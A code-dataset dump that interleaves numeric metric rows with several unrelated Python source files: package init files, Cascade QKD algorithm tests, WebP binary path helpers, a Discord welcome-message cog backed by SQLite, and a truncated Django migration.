| 34.8
| 0.693333
| 0
| 0
| 0
| 0
| 0.25
| 0.542857
| 0.12
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
52087542fc97d4e7b380f91bd3bd306218d08520
| 152
|
py
|
Python
|
dis_snek/utils/__init__.py
|
KAJdev/Dis-Snek
|
f2bbdd2b8ae2b4ccd7351d0ed01e1c77573669c2
|
[
"MIT"
] | 34
|
2021-08-03T13:58:14.000Z
|
2021-10-04T11:09:44.000Z
|
dis_snek/utils/__init__.py
|
KAJdev/Dis-Snek
|
f2bbdd2b8ae2b4ccd7351d0ed01e1c77573669c2
|
[
"MIT"
] | 6
|
2021-08-05T12:58:33.000Z
|
2021-10-04T01:18:07.000Z
|
dis_snek/utils/__init__.py
|
KAJdev/Dis-Snek
|
f2bbdd2b8ae2b4ccd7351d0ed01e1c77573669c2
|
[
"MIT"
] | 9
|
2021-07-30T14:10:45.000Z
|
2021-10-03T17:36:26.000Z
|
from .attr_utils import *
from .cache import *
from .converters import *
from .input_utils import *
from .misc_utils import *
from .serializer import *
| 21.714286
| 26
| 0.763158
| 21
| 152
| 5.380952
| 0.428571
| 0.442478
| 0.39823
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 152
| 6
| 27
| 25.333333
| 0.882813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
523a26d2b50c9c3ea26de8f08930482640fe3a4e
| 149
|
py
|
Python
|
stweet/export_data/__init__.py
|
iJohnMaged/stweet
|
00f4a12b1da1be514266b74a7ca70a669f0c8ae4
|
[
"MIT"
] | 1
|
2021-04-15T17:45:39.000Z
|
2021-04-15T17:45:39.000Z
|
stweet/export_data/__init__.py
|
chillerno1/stweet
|
ff7224a7b69b711b17247db40f859e620747e20b
|
[
"MIT"
] | null | null | null |
stweet/export_data/__init__.py
|
chillerno1/stweet
|
ff7224a7b69b711b17247db40f859e620747e20b
|
[
"MIT"
] | 1
|
2022-01-05T11:20:31.000Z
|
2022-01-05T11:20:31.000Z
|
from .tweet_export import export_tweets_to_csv, export_tweets_to_json_lines
from .user_export import export_users_to_csv, export_users_to_json_lines
| 49.666667
| 75
| 0.90604
| 26
| 149
| 4.576923
| 0.423077
| 0.201681
| 0.302521
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067114
| 149
| 2
| 76
| 74.5
| 0.856115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
52814eeb4c3f42d2121f009a4775eb7ac4a342be
| 5,869
|
py
|
Python
|
cascade/tests/test_algorithm.py
|
brunorijsman/qkd-cascade
|
32fa65d45f81f08ac84867f8eea9ab93dfb1dbe2
|
[
"MIT"
] | 10
|
2020-05-13T06:09:36.000Z
|
2022-03-27T13:02:38.000Z
|
cascade/tests/test_algorithm.py
|
brunorijsman/qkd-cascade
|
32fa65d45f81f08ac84867f8eea9ab93dfb1dbe2
|
[
"MIT"
] | 1
|
2021-06-02T00:52:00.000Z
|
2021-06-02T00:52:00.000Z
|
cascade/tests/test_algorithm.py
|
brunorijsman/qkd-cascade
|
32fa65d45f81f08ac84867f8eea9ab93dfb1dbe2
|
[
"MIT"
] | 6
|
2020-05-20T16:20:38.000Z
|
2021-08-19T04:47:15.000Z
|
from cascade.algorithm import get_algorithm_by_name
def test_original_algorithm():
    """Check the registered parameters of the 'original' Cascade variant."""
    algo = get_algorithm_by_name('original')
    assert algo.name == "original"
    assert algo.cascade_iterations == 4
    # (estimated error rate, key size, iteration) -> expected block size.
    for args, expected_size in [
        ((0.0, 10000, 1), 73000),
        ((0.1, 10000, 1), 8),
        ((0.01, 10000, 1), 73),
        ((0.01, 10000, 2), 146),
        ((0.01, 10000, 3), 292),
        ((0.001, 10000, 1), 730),
    ]:
        assert algo.block_size_function(*args) == expected_size
    assert algo.biconf_iterations == 0
    assert not algo.biconf_error_free_streak
    assert not algo.biconf_correct_complement
    assert not algo.biconf_cascade
    assert not algo.sub_block_reuse
    assert not algo.block_parity_inference
def test_biconf_algorithm():
    """Check the registered parameters of the 'biconf' Cascade variant."""
    algo = get_algorithm_by_name('biconf')
    assert algo.name == "biconf"
    assert algo.cascade_iterations == 2
    # (estimated error rate, key size, iteration) -> expected block size.
    for args, expected_size in [
        ((0.0, 10000, 1), 92000),
        ((0.1, 10000, 1), 10),
        ((0.01, 10000, 1), 92),
        ((0.01, 10000, 2), 276),
        ((0.01, 10000, 3), 828),
        ((0.001, 10000, 1), 920),
    ]:
        assert algo.block_size_function(*args) == expected_size
    assert algo.biconf_iterations == 10
    assert algo.biconf_error_free_streak
    assert not algo.biconf_correct_complement
    assert not algo.biconf_cascade
    assert not algo.sub_block_reuse
    assert not algo.block_parity_inference
def test_yanetal_algorithm():
    """Check the registered parameters of the 'yanetal' Cascade variant."""
    algo = get_algorithm_by_name('yanetal')
    assert algo.name == "yanetal"
    assert algo.cascade_iterations == 10
    # (estimated error rate, key size, iteration) -> expected block size.
    for args, expected_size in [
        ((0.0, 10000, 1), 80000),
        ((0.1, 10000, 1), 8),
        ((0.01, 10000, 1), 80),
        ((0.01, 10000, 2), 400),
        ((0.01, 10000, 3), 5000),
        ((0.001, 10000, 1), 800),
    ]:
        assert algo.block_size_function(*args) == expected_size
    assert algo.biconf_iterations == 0
    assert not algo.biconf_error_free_streak
    assert not algo.biconf_correct_complement
    assert not algo.biconf_cascade
    assert not algo.sub_block_reuse
    assert not algo.block_parity_inference
def test_option3_algorithm():
    """Check the registered parameters of the 'option3' Cascade variant."""
    algo = get_algorithm_by_name('option3')
    assert algo.name == "option3"
    assert algo.cascade_iterations == 16
    # (estimated error rate, key size, iteration) -> expected block size.
    for args, expected_size in [
        ((0.0, 10000, 1), 100000),
        ((0.1, 10000, 1), 10),
        ((0.01, 10000, 1), 100),
        ((0.01, 10000, 2), 200),
        ((0.01, 10000, 3), 5000),
        ((0.001, 10000, 1), 1000),
    ]:
        assert algo.block_size_function(*args) == expected_size
    assert algo.biconf_iterations == 0
    assert not algo.biconf_error_free_streak
    assert not algo.biconf_correct_complement
    assert not algo.biconf_cascade
    assert not algo.sub_block_reuse
    assert not algo.block_parity_inference
def test_option4_algorithm():
    """Check the registered parameters of the 'option4' Cascade variant."""
    algo = get_algorithm_by_name('option4')
    assert algo.name == "option4"
    assert algo.cascade_iterations == 16
    # (estimated error rate, key size, iteration) -> expected block size.
    for args, expected_size in [
        ((0.0, 10000, 1), 100000),
        ((0.1, 10000, 1), 10),
        ((0.01, 10000, 1), 100),
        ((0.01, 10000, 2), 200),
        ((0.01, 10000, 3), 5000),
        ((0.001, 10000, 1), 1000),
    ]:
        assert algo.block_size_function(*args) == expected_size
    assert algo.biconf_iterations == 0
    assert not algo.biconf_error_free_streak
    assert not algo.biconf_correct_complement
    assert not algo.biconf_cascade
    # Unlike option3, this variant enables sub-block reuse.
    assert algo.sub_block_reuse
    assert not algo.block_parity_inference
def test_option7_algorithm():
    """Check the registered parameters of the 'option7' Cascade variant."""
    algo = get_algorithm_by_name('option7')
    assert algo.name == "option7"
    assert algo.cascade_iterations == 14
    # (estimated error rate, key size, iteration) -> expected block size.
    for args, expected_size in [
        ((0.0, 10000, 1), 131072),
        ((0.1, 10000, 1), 16),
        ((0.01, 10000, 1), 128),
        ((0.01, 10000, 2), 512),
        ((0.01, 10000, 3), 5000),
        ((0.001, 10000, 1), 1024),
    ]:
        assert algo.block_size_function(*args) == expected_size
    assert algo.biconf_iterations == 0
    assert not algo.biconf_error_free_streak
    assert not algo.biconf_correct_complement
    assert not algo.biconf_cascade
    assert algo.sub_block_reuse
    assert not algo.block_parity_inference
def test_option8_algorithm():
    """Check the registered parameters of the 'option8' Cascade variant."""
    algo = get_algorithm_by_name('option8')
    assert algo.name == "option8"
    assert algo.cascade_iterations == 14
    # (estimated error rate, key size, iteration) -> expected block size.
    # Note this variant is pinned at four iteration depths for QBER 0.01.
    for args, expected_size in [
        ((0.0, 10000, 1), 131072),
        ((0.1, 10000, 1), 8),
        ((0.01, 10000, 1), 128),
        ((0.01, 10000, 2), 1024),
        ((0.01, 10000, 3), 4096),
        ((0.01, 10000, 4), 5000),
        ((0.001, 10000, 1), 1024),
    ]:
        assert algo.block_size_function(*args) == expected_size
    assert algo.biconf_iterations == 0
    assert not algo.biconf_error_free_streak
    assert not algo.biconf_correct_complement
    assert not algo.biconf_cascade
    assert algo.sub_block_reuse
    assert not algo.block_parity_inference
| 48.106557
| 65
| 0.757028
| 812
| 5,869
| 5.215517
| 0.082512
| 0.24085
| 0.20307
| 0.243684
| 0.876033
| 0.876033
| 0.816529
| 0.815584
| 0.806139
| 0.699882
| 0
| 0.112389
| 0.155563
| 5,869
| 121
| 66
| 48.504132
| 0.742131
| 0
| 0
| 0.596491
| 0
| 0
| 0.016698
| 0
| 0
| 0
| 0
| 0
| 0.868421
| 1
| 0.061404
| false
| 0
| 0.008772
| 0
| 0.070175
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
871a2c025bcf94be50887fc1167c6325351793a9
| 114
|
py
|
Python
|
src/skeleton/sub2/__init__.py
|
jcschindler01/skeleton
|
52ccd2428f90ffb9a15ba35cea420801564b22eb
|
[
"MIT"
] | null | null | null |
src/skeleton/sub2/__init__.py
|
jcschindler01/skeleton
|
52ccd2428f90ffb9a15ba35cea420801564b22eb
|
[
"MIT"
] | null | null | null |
src/skeleton/sub2/__init__.py
|
jcschindler01/skeleton
|
52ccd2428f90ffb9a15ba35cea420801564b22eb
|
[
"MIT"
] | null | null | null |
"""
This subpackage contains modules C and D.
"""
from skeleton.sub2 import modC
from skeleton.sub2 import modD
| 14.25
| 41
| 0.754386
| 17
| 114
| 5.058824
| 0.764706
| 0.27907
| 0.372093
| 0.511628
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021053
| 0.166667
| 114
| 7
| 42
| 16.285714
| 0.884211
| 0.359649
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
873986bea3b26f5e45ff9cb17a3d9884926c7206
| 3,200
|
py
|
Python
|
webptools/webpbin.py
|
Coder-Iro/webptools
|
b540f6281260f6123c1ed54988ceed75c64f2841
|
[
"MIT"
] | null | null | null |
webptools/webpbin.py
|
Coder-Iro/webptools
|
b540f6281260f6123c1ed54988ceed75c64f2841
|
[
"MIT"
] | null | null | null |
webptools/webpbin.py
|
Coder-Iro/webptools
|
b540f6281260f6123c1ed54988ceed75c64f2841
|
[
"MIT"
] | null | null | null |
import platform
from os.path import dirname, abspath
def getcwebp() -> str:
    """Return the path of the bundled ``cwebp`` binary for this platform.

    :return: absolute path to the binary on Linux, 64-bit Windows and
        macOS; implicitly ``None`` (after printing a diagnostic) on
        unsupported platforms.
    """
    if platform.system() == 'Linux':
        return dirname(
            dirname(abspath(__file__))) + '/lib/libwebp_linux/bin/cwebp'
    elif platform.system() == 'Windows':
        arch = platform.architecture()
        if arch[0] == '64bit':
            return dirname(dirname(
                abspath(__file__))) + '/lib/libwebp_win64/bin/cwebp.exe'
        # BUG FIX: the original used `and`, which a single value can never
        # satisfy for two different strings, so the unsupported-32-bit
        # branch was unreachable and the function fell through silently.
        elif arch[0] == '32bit' or arch[0] == '86bit':
            print('Unsupported platform:', platform.system(),
                  platform.architecture())
    elif platform.system() == 'Darwin':
        return dirname(
            dirname(abspath(__file__))) + '/lib/libwebp_osx/bin/cwebp'
    else:
        print('Unsupported platform:', platform.system(),
              platform.architecture())
def getdwebp() -> str:
    """Return the path of the bundled ``dwebp`` binary for this platform.

    :return: absolute path to the binary on Linux, 64-bit Windows and
        macOS; implicitly ``None`` (after printing a diagnostic) on
        unsupported platforms.
    """
    if platform.system() == 'Linux':
        return dirname(
            dirname(abspath(__file__))) + '/lib/libwebp_linux/bin/dwebp'
    elif platform.system() == 'Windows':
        arch = platform.architecture()
        if arch[0] == '64bit':
            return dirname(dirname(
                abspath(__file__))) + '/lib/libwebp_win64/bin/dwebp.exe'
        # BUG FIX: `and` made this branch unreachable (one value cannot
        # equal two different strings); use `or` so 32-bit Windows is
        # reported instead of silently returning None.
        elif arch[0] == '32bit' or arch[0] == '86bit':
            print('Unsupported platform:', platform.system(),
                  platform.architecture())
    elif platform.system() == 'Darwin':
        return dirname(
            dirname(abspath(__file__))) + '/lib/libwebp_osx/bin/dwebp'
    else:
        print('Unsupported platform:', platform.system(),
              platform.architecture())
def getgifwebp() -> str:
    """Return the path of the bundled ``gif2webp`` binary for this platform.

    :return: absolute path to the binary on Linux, 64-bit Windows and
        macOS; implicitly ``None`` (after printing a diagnostic) on
        unsupported platforms.
    """
    if platform.system() == 'Linux':
        return dirname(
            dirname(abspath(__file__))) + '/lib/libwebp_linux/bin/gif2webp'
    elif platform.system() == 'Windows':
        arch = platform.architecture()
        if arch[0] == '64bit':
            return dirname(dirname(
                abspath(__file__))) + '/lib/libwebp_win64/bin/gif2webp.exe'
        # BUG FIX: `and` made this branch unreachable (one value cannot
        # equal two different strings); use `or` so 32-bit Windows is
        # reported instead of silently returning None.
        elif arch[0] == '32bit' or arch[0] == '86bit':
            print('Unsupported platform:', platform.system(),
                  platform.architecture())
    elif platform.system() == 'Darwin':
        return dirname(
            dirname(abspath(__file__))) + '/lib/libwebp_osx/bin/gif2webp'
    else:
        print('Unsupported platform:', platform.system(),
              platform.architecture())
def getwebpmux() -> str:
    """Return the path of the bundled ``webpmux`` binary for this platform.

    :return: absolute path to the binary on Linux, 64-bit Windows and
        macOS; implicitly ``None`` (after printing a diagnostic) on
        unsupported platforms.
    """
    if platform.system() == 'Linux':
        return dirname(
            dirname(abspath(__file__))) + '/lib/libwebp_linux/bin/webpmux'
    elif platform.system() == 'Windows':
        arch = platform.architecture()
        if arch[0] == '64bit':
            return dirname(dirname(
                abspath(__file__))) + '/lib/libwebp_win64/bin/webpmux.exe'
        # BUG FIX: `and` made this branch unreachable (one value cannot
        # equal two different strings); use `or` so 32-bit Windows is
        # reported instead of silently returning None.
        elif arch[0] == '32bit' or arch[0] == '86bit':
            print('Unsupported platform:', platform.system(),
                  platform.architecture())
    elif platform.system() == 'Darwin':
        return dirname(
            dirname(abspath(__file__))) + '/lib/libwebp_osx/bin/webpmux'
    else:
        print('Unsupported platform:', platform.system(),
              platform.architecture())
| 38.554217
| 75
| 0.575938
| 312
| 3,200
| 5.714744
| 0.13141
| 0.157039
| 0.134605
| 0.181716
| 0.911385
| 0.911385
| 0.911385
| 0.911385
| 0.876612
| 0.767246
| 0
| 0.020215
| 0.273438
| 3,200
| 82
| 76
| 39.02439
| 0.746667
| 0
| 0
| 0.756757
| 0
| 0
| 0.205938
| 0.112188
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.027027
| 0
| 0.243243
| 0.108108
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
874d09e664c1eb52208b4ad7c98d29240e8c3412
| 6,945
|
py
|
Python
|
cogs/Welcome.py
|
J0k3rrWild/XantBot
|
2fd3c4b9b973dd9e49a05bcc09f409a8e97bec01
|
[
"MIT"
] | null | null | null |
cogs/Welcome.py
|
J0k3rrWild/XantBot
|
2fd3c4b9b973dd9e49a05bcc09f409a8e97bec01
|
[
"MIT"
] | null | null | null |
cogs/Welcome.py
|
J0k3rrWild/XantBot
|
2fd3c4b9b973dd9e49a05bcc09f409a8e97bec01
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands
import asyncio
import datetime
import sqlite3
# Module-level SQLite connection and cursor shared by every command and
# listener in this cog.
# NOTE(review): a single global connection/cursor is not safe for
# concurrent use — confirm the bot only accesses it from one event loop.
conn = sqlite3.connect('main.db')
c = conn.cursor()
class Welcome(commands.Cog):
    """Cog handling per-guild welcome/leave messages.

    Settings are read from and written to the module-level SQLite
    database: the ``guilds_modules`` table gates the feature per guild
    (``welcome`` column, 'on'/'off') and the ``guilds`` table stores the
    welcome/leave text and target channel.

    NOTE(review): the SELECT statements below interpolate guild IDs via
    f-strings rather than parameterized queries. The IDs are integers
    coming from discord.py, so injection is unlikely, but parameterizing
    them (as the UPDATEs already do) would be safer and consistent.
    """

    def __init__(self, bot):
        # Bot reference, used to resolve channels in the listeners.
        self.bot = bot

    @commands.command(aliases=['set_welcome_text', 'set-welcome-text', 'set-welcome-message', 'set_welcome_message'])
    @commands.has_permissions(administrator=True)
    async def setwelcometext(self, ctx, *, text):
        """Store the guild's welcome message template (admin only)."""
        # Feature gate: is the welcome module enabled for this guild?
        c.execute(f"SELECT welcome FROM guilds_modules WHERE guild_id = {ctx.guild.id}")
        r = c.fetchone()
        welcome_module = r[0]
        if welcome_module == "on":
            c.execute(f"SELECT welcome_text FROM guilds WHERE guild_id = {ctx.guild.id}")
            r = c.fetchone()
            sql = ("UPDATE guilds SET welcome_text = ? WHERE guild_id = ?")
            val = (text, ctx.guild.id)
            c.execute(sql, val)
            embed = discord.Embed()
            embed.add_field(name='Success!', value=f'Welcome text has been updated to ``{text}``')
            await ctx.send(embed=embed)
            conn.commit()
        else:
            embed = discord.Embed()
            embed.add_field(name='Error!', value=f'Log module is off in guilds modules. Use ``x!modules log [on/off] `` to change this')
            await ctx.send(embed=embed)

    @commands.command(aliases=['set_leave_text', 'set-leave-text', 'set_leave_message', "set-leave-message"])
    @commands.has_permissions(administrator=True)
    async def setleavetext(self, ctx, *, text):
        """Store the guild's leave message template (admin only)."""
        c.execute(f"SELECT welcome FROM guilds_modules WHERE guild_id = {ctx.guild.id}")
        r = c.fetchone()
        welcome_module = r[0]
        if welcome_module == "on":
            c.execute(f"SELECT leave_text FROM guilds WHERE guild_id = {ctx.guild.id}")
            r = c.fetchone()
            sql = ("UPDATE guilds SET leave_text = ? WHERE guild_id = ?")
            val = (text, ctx.guild.id)
            c.execute(sql, val)
            embed = discord.Embed()
            embed.add_field(name='Success!', value=f'Leave text has been updated to ``{text}``')
            await ctx.send(embed=embed)
            conn.commit()
        else:
            embed = discord.Embed()
            embed.add_field(name='Error!',
                            value=f'Log module is off in guilds modules. Use ``x!modules log [on/off] `` to change this')
            await ctx.send(embed=embed)

    @commands.command(aliases=['set-log-channel', 'set_log_channel'])
    @commands.has_permissions(administrator=True)
    async def setwelcomechannel(self, ctx, channel:discord.TextChannel):
        """Set the channel welcome/leave embeds are posted to (admin only)."""
        c.execute(f"SELECT welcome FROM guilds_modules WHERE guild_id = {ctx.guild.id}")
        r = c.fetchone()
        welcome_module = r[0]
        if welcome_module == "on":
            c.execute(f"SELECT welcome_channel FROM guilds WHERE guild_id = {ctx.guild.id}")
            r = c.fetchone()
            sql = ("UPDATE guilds SET welcome_channel = ? WHERE guild_id = ?")
            val = (channel.id, ctx.guild.id)
            c.execute(sql, val)
            embed = discord.Embed()
            embed.add_field(name='Success!', value=f'Log Channel has been updated to {channel.mention}')
            await ctx.send(embed=embed)
            conn.commit()
        else:
            embed = discord.Embed()
            embed.add_field(name='Error!', value=f'Log module is off in guilds modules. Use ``x!modules log [on/off] `` to change this')
            await ctx.send(embed=embed)

    @commands.Cog.listener()
    async def on_member_join(self, member):
        """Post the configured welcome embed when a (non-bot) member joins."""
        c.execute(f"SELECT welcome FROM guilds_modules WHERE guild_id = {member.guild.id}")
        r = c.fetchone()
        welcome_module = r[0]
        if welcome_module == "on":
            if member.bot:
                # Bots joining the guild are ignored.
                pass
            else:
                c.execute(f"SELECT welcome_channel FROM guilds WHERE guild_id = {member.guild.id}")
                r = c.fetchone()
                welcome_channel = r[0]
                c.execute(f"SELECT welcome_text FROM guilds WHERE guild_id = {member.guild.id}")
                r1 = c.fetchone()
                welcome_text = r1[0]
                # Values exposed to the stored template via str.format:
                # {members}, {mention}, {user}, {guild}.
                members = len(list(member.guild.members))
                mention = member.mention
                user = member.name
                guild = member.guild
                embed = discord.Embed(title="User joined the server!", colour=0x43780, description=str(welcome_text).format(members=members, mention=mention, user=user, guild=guild))
                embed.add_field(name="Account created at: ", value=member.created_at.strftime("%A, %d %B %Y, %H:%M:%S UTC"), inline=False)
                embed.set_thumbnail(url=f"{member.avatar_url}")
                embed.set_author(name=f"{member.name}", icon_url=f"{member.avatar_url}")
                embed.set_footer(text=f"{member.guild}", icon_url=f"{member.guild.icon_url}")
                embed.timestamp = datetime.datetime.utcnow()
                channel = self.bot.get_channel(int(welcome_channel))
                await channel.send(embed=embed)
        else:
            pass

    @commands.Cog.listener()
    async def on_member_remove(self, member):
        """Post the configured leave embed when a (non-bot) member leaves."""
        c.execute(f"SELECT welcome FROM guilds_modules WHERE guild_id = {member.guild.id}")
        r = c.fetchone()
        welcome_module = r[0]
        if welcome_module == "on":
            if member.bot:
                # Bots leaving the guild are ignored.
                pass
            else:
                c.execute(f"SELECT welcome_channel FROM guilds WHERE guild_id = {member.guild.id}")
                r = c.fetchone()
                welcome_channel = r[0]
                c.execute(f"SELECT leave_text FROM guilds WHERE guild_id = {member.guild.id}")
                r1 = c.fetchone()
                welcome_text = r1[0]
                # Same template placeholders as on_member_join.
                members = len(list(member.guild.members))
                mention = member.mention
                user = member.name
                guild = member.guild
                embed = discord.Embed(title="User has left from the server!", colour=0x43780,
                                      description=str(welcome_text).format(members=members, mention=mention, user=user,
                                                                           guild=guild,))
                embed.set_thumbnail(url=f"{member.avatar_url}")
                embed.set_author(name=f"{member.name}", icon_url=f"{member.avatar_url}")
                embed.set_footer(text=f"{member.guild}", icon_url=f"{member.guild.icon_url}")
                embed.timestamp = datetime.datetime.utcnow()
                channel = self.bot.get_channel(int(welcome_channel))
                await channel.send(embed=embed)
        else:
            pass
def setup(bot):
    """Extension entry point: register the Welcome cog with the bot."""
    cog = Welcome(bot)
    bot.add_cog(cog)
| 44.235669
| 183
| 0.565011
| 838
| 6,945
| 4.568019
| 0.146778
| 0.054859
| 0.047022
| 0.047022
| 0.859718
| 0.842215
| 0.842215
| 0.813741
| 0.785528
| 0.785528
| 0
| 0.005695
| 0.317351
| 6,945
| 156
| 184
| 44.519231
| 0.80173
| 0
| 0
| 0.704545
| 0
| 0.022727
| 0.269848
| 0.006776
| 0
| 0
| 0.002062
| 0
| 0
| 1
| 0.015152
| false
| 0.030303
| 0.037879
| 0
| 0.060606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
875ae2223ef1abf2b423e9f312b398c979fcbe83
| 8,985
|
py
|
Python
|
tvdordrecht/webapp/migrations/0002_auto_20151105_2334.py
|
allcaps/tvdordrecht.nl
|
a2ff1b5ade88378f1a72a7ab36d51965b06509b9
|
[
"MIT"
] | null | null | null |
tvdordrecht/webapp/migrations/0002_auto_20151105_2334.py
|
allcaps/tvdordrecht.nl
|
a2ff1b5ade88378f1a72a7ab36d51965b06509b9
|
[
"MIT"
] | 1
|
2022-01-13T00:48:55.000Z
|
2022-01-13T00:48:55.000Z
|
tvdordrecht/webapp/migrations/0002_auto_20151105_2334.py
|
allcaps/tvdordrecht.nl
|
a2ff1b5ade88378f1a72a7ab36d51965b06509b9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('webapp', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='image',
name='image_editing',
field=models.CharField(default=b'', max_length=100, verbose_name=b'Afbeelding roteren', blank=True, choices=[('90', '90\xb0'), ('180', '180\xb0 '), ('270', '270\xb0'), ('double', 'Double the size')]),
),
migrations.AlterField(
model_name='image',
name='last_modified',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 32, 56, 361960), verbose_name=b'laatst bewerkt', auto_now=True),
preserve_default=False,
),
migrations.AlterField(
model_name='image',
name='owner',
field=models.ForeignKey(related_name='image_owner', verbose_name=b'gemaakt door', blank=True, to=settings.AUTH_USER_MODEL, null=True),
),
migrations.AlterField(
model_name='image',
name='pub_date',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 33, 1, 571704), verbose_name=b'publicatie datum', auto_now_add=True),
preserve_default=False,
),
migrations.AlterField(
model_name='image',
name='sortorder',
field=models.IntegerField(help_text=b'\n Als er meerdere afbeeldingen in een foto-album staan, worden ze standaard \n op alfabetische volgorde weergeven. Om de volgorde te wijzigen geef je een \n sortering (getal) bij alle te ordenen afbeeldigen in.\n ', null=True, verbose_name=b'Sortering', blank=True),
),
migrations.AlterField(
model_name='menu',
name='description',
field=models.TextField(help_text=b'\n Maximaal 250 karakters (Google zoekresultaten geven alleen de eerste 150 \n karakters weer).<br>\n Maak een relevante description. Bij voorkeur met tekst die op de pagina \n voorkomt.</br>\n Bij een leeg descriptionveld wordt description gegenereerd op basis van de \n inhoud van het tekstveld.\n ', max_length=250, blank=True),
),
migrations.AlterField(
model_name='menu',
name='html',
field=models.TextField(default='', verbose_name=b'html', blank=True),
preserve_default=False,
),
migrations.AlterField(
model_name='menu',
name='image',
field=models.ForeignKey(related_name='menu_image', blank=True, to='webapp.Image', help_text=b'\n Deze afbeelding komt op een vaste positie. Gebruik het afbeeldings-icoon\n in de text-editor om afbeeldingen tussen de lopende tekst in te voegen.\n ', null=True, verbose_name=b'afbeelding'),
),
migrations.AlterField(
model_name='menu',
name='keywords',
field=models.TextField(help_text=b"\n Alleen relevante keywords. Niet relevante keywords (die niet in de tekst \n voorkomen) doen pagina's zakken.<br>\n Bij een leeg keywordveld worden keywords gegenereerd op basis van de \n inhoud van het tekstveld.\n ", blank=True),
),
migrations.AlterField(
model_name='menu',
name='last_modified',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 33, 23, 947703), verbose_name=b'laatst bewerkt', auto_now=True),
preserve_default=False,
),
migrations.AlterField(
model_name='menu',
name='owner',
field=models.ForeignKey(related_name='menu_owner', verbose_name=b'gemaakt door', blank=True, to=settings.AUTH_USER_MODEL, null=True),
),
migrations.AlterField(
model_name='menu',
name='pub_date',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 33, 28, 642875), verbose_name=b'publicatie datum', auto_now_add=True),
preserve_default=False,
),
migrations.AlterField(
model_name='menu',
name='table_of_contents',
field=models.TextField(default='', verbose_name=b'table of contents', blank=True),
preserve_default=False,
),
migrations.AlterField(
model_name='news',
name='description',
field=models.TextField(help_text=b'\n Maximaal 250 karakters (Google zoekresultaten geven alleen de eerste 150 \n karakters weer).<br>\n Maak een relevante description. Bij voorkeur met tekst die op de pagina \n voorkomt.</br>\n Bij een leeg descriptionveld wordt description gegenereerd op basis van de \n inhoud van het tekstveld.\n ', max_length=250, blank=True),
),
migrations.AlterField(
model_name='news',
name='image',
field=models.ForeignKey(related_name='news_image', blank=True, to='webapp.Image', help_text=b'\n Deze afbeelding komt op een vaste positie. Gebruik het afbeeldings-icoon\n in de text-editor om afbeeldingen tussen de lopende tekst in te voegen.\n ', null=True, verbose_name=b'afbeelding'),
),
migrations.AlterField(
model_name='news',
name='keywords',
field=models.TextField(help_text=b"\n Alleen relevante keywords. Niet relevante keywords (die niet in de tekst \n voorkomen) doen pagina's zakken.<br>\n Bij een leeg keywordveld worden keywords gegenereerd op basis van de \n inhoud van het tekstveld.\n ", blank=True),
),
migrations.AlterField(
model_name='news',
name='last_modified',
field=models.DateTimeField(default=datetime.datetime(2015, 11, 5, 23, 33, 40, 588617), verbose_name=b'laatst bewerkt', auto_now=True),
preserve_default=False,
),
migrations.AlterField(
